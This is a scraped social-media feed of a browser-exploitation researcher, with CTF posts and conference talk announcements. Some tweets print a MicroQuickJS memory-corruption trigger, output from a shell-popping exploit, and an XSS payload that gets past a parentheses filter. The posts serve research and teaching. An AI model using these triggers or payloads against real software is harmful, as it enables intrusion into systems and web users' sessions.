itszn (@itszn13) / X

itszn

1,320 posts

itszn

@itszn13

Amy | Security researcher @ OpenAI | stackchk.fail/ctf.txt | bsky: nyanbox.stackchk.fail | LLM ART: bsky.app/profile/altern…

she/her

Joined June 2011

Pinned
itszn
@itszn13
Jan 12
When MicroQuickJS released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault: var arr = new Array(30) var attack = { valueOf: function() { arr.length = 0 arr.length = 3 return 10 } } arr.splice(attack, 30) I document the full Ritual Process below
itszn
@itszn13
Dec 24, 2025
New JS engine, old JS vulns :) Found a bug and wrote an exploit in 8 hours 645da364a8089c43953b345d3004fc76148cb2f136f74e211429ddc8452846d1 exp-shell.js ./mqjs ./exp-shell.js LEAKED: 77b6 1c5ff205 LIBC BASE: 77b6 1d600000 STACK PTR: 7ffd 143e1bb8 WROTE ROP CHAIN $ whoami nyan
28K
itszn
@itszn13
Mar 21, 2025
Claude reversing a binary using Binary Ninja via MCP while I get a snack @bl4sty @ziyadedher @vector35
00:00
blasty
@bl4sty
Mar 21, 2025
who's building the IDA Pro MCP? "please annotate the shit out of this monolithic 64MiB firmware binary while I get some coffee, will ya?"
226K
itszn
@itszn13
Jul 6, 2019
Decided to take @qwertyoruiopz's nday and write a full exploit for it. Here is a exploit for iOS 12.3.1 doing SOP bypass via arbitrary read/write
00:00
itszn
@itszn13
Feb 29, 2020
Scientists say that Dark Matter takes up 85% of matter in our universe. But what they don't know is that it is made up entirely of Page Tables that keep track of the rest of the matter
itszn
@itszn13
Mar 1, 2020
You can see the heap bof at the end of the payload, where they are still using aaaaaaaaaaaaa to pad. What is this? A CTF exploit?
AIfredo 0rtega
@ortegaalfredo
Feb 28, 2020
This is the complete DNA of the Coronavirus (SARS-CoV-2). We are being attacked by a 8 kilobytes virus. Remember this when you hate on computers security. (source: ncbi.nlm.nih.gov/nuccore/MN9089… )
itszn
@itszn13
Oct 10, 2019
If you ever tried to perform XSS without parenthesis, you may have realized that eval`payload` does not work. However you can do this instead: Function`alert\`xss\````
itszn
@itszn13
Sep 8, 2019
Here is my exploit for the ChakraCore JIT exploit challenge for @TrendMicroCTF 2019 Was fun to take a break from V8 and JavaScriptCore
Trendmicro CTF ChakraCore exploit
From gist.github.com
itszn
@itszn13
Jun 16, 2021
Have ever wanted to learn how to bypass PAC, but you don't have the hardware or time to set up emulation? You are in luck! We now have an *in browser* intro PAC exploitation challenge you can play right now!
RET2 Systems
@ret2systems
Jun 16, 2021
Exploiting the notoriously unsafe gets() on a PAC-protected ARM64 binary, how hard could it be? Check out our latest blogpost to find out: blog.ret2.io/2021/06/16/int…
GIF
itszn
@itszn13
Aug 29, 2024
Today is the 10 year anniversary of the first time I ever pwned anything! My first exploit was a simple stack smash, overwrite return ptr, jump to admin function. This was an in internal recruiting CTF by @gaasedelen for the RPISEC Before that day I had never even considered
24K
itszn
@itszn13
Dec 24, 2021
Tricky JavaScript Syntax - Without trying it, what will this function return:
itszn
@itszn13
Feb 14, 2020
The video of my BlueHatIL talk is now online! Check out how I attack other websites from inside the Safari Sandbox Forget the Sandbox Escape: Abusing Browsers from Code Execution
itszn
@itszn13
Jan 20, 2020
Been waiting to announce: I'll be presenting "Forget the Sandbox Escape: Abusing Browsers from Code Execution" at this year's BluehatIL This talk will look at what attacks you can pull off in browsers without needing a sandbox escape I will also be demoing a POC of persistence
BlueHat IL
@BlueHatIL
Jan 20, 2020
The wait is finally over! Registration & schedule for #BlueHatIL 2020 are live. Places are limited so register NOW: bluehatil.com
itszn
@itszn13
Aug 13, 2020
Watch it to the end to see real pwning :)
00:00
itszn
@itszn13
Jun 18, 2020
Is this what people mean when they talk about free speech?